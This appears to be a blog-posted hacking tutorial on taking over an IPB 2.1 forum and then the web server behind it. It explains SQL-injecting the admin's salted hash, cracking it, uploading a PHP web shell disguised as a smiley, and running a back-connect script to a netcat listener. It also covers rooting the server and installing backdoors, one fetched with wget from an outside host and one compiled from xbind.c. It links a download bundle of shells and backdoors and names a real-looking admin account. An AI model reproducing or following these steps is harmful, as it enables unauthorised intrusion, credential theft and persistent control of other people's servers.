Scratch Complete Tutorial
Intro:
For todays tutorial we shall learn how to
exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.
1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access
Hacking a Forum Admin using Exploit to Gain,
Admin Access - Part 1:
As said earlier i'm going to exploit ipb v2.1 forum here. You can hack
other forums too using exploits or making own exploits (which is rare )
Tools Needed:
This has the shell and backdoor files along with MD5 HashCracking tool and
some other things.
Download:
Code:
http://depositfiles.com/files/9juskrtax
Gaining Admin Access:
For today i will be hacking an ipb 2.1 forum by gaining admin access and
then I will show you how to root the server.
First i will be using a perl exploit and gain admin access to the forum. Usually the admin id
is 1 maybe 0 or 2 sometimes.
Here it is this guy:
UserName: Kawool
UserId = 2
Next we extract the user hash and salt. Switch to cmd and execute the perl
exploit.
Then you should see this sql injection tool.
Change the forum index path, userid (of the admin), the table name.
After you click get data from database you should see this hash:
Then use converage pass salt option.
After you get the hash the next step to do is crack the salted hash. Since
it is ipb , cracking the hash will be a pain for sure.
Cracking the Hash:
I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.
Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.
I got mine after sometime.
So now:
Code:
Username: Kawool
Password: *******
I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.
Uploading The Shell as Admin - Part 2:
Uploading a Shell:
Now that we have the admin access in our hand now is the part when we
upload a shell (For those who don't know what a shell is, It is a php script that gives
privilages to upload files on a website, mess with other files etc. And yeah allows to gain
root access too).
Uploading shell as smiley here.
In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.
Now lets browse our shell shall we..
w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did
this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.
Once its done we upload c99 shell.
Good shell was uploaded properly.
That does it for our 2nd part. Move on to Third.
Using the Shell to Gain Root Access - Part 3:
Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.
So i upload back.pl i provided in the file.
After thats done time to use the script.
For this we give the following code.
Code:
perl back.pl youripaddress
BEFORE we execute the script we need to start netcat and start listening to conenctions on
port 2121.
use netcat from my downloadfile, and use the command:
Code:
nc -vv -l -p 2121
Next we shall upload an exploit that will let us obtain root status on the server
Time to execute it.
Now we upload a backdoor for future access.
Type in the following command:
Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)
Now the following command:
Code:
tar -zxvf sshdoor.tgz
Then we make sshdoor the current directory using this code:
Code:
cd sshdoor
Then:
Code:
cat README
after you see the window with sang and prabu name. Execute the command:
Code:
.install yourpassword 2121
After thats done, we connect to the server via putty.
Err an Epic Fail has occured my friends.
Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).
Now we upload xbind.c this should be over quickly. Remember the steps don't you?
Indeed its easy.
Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):
Code:
gcc -o xbind xbind.c
Compile, run and connect.
Paste the following code now:
Code:
./xbind 1985
Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.
Now enter teh password and get going.
Code:
uname -a
There you go, we now have future access to the server
That does it for our Rooting Server tutorial. Yeah i agree, Gaining root access is a pain but its worth the reward.
Tutorial Source
0 comments:
Post a Comment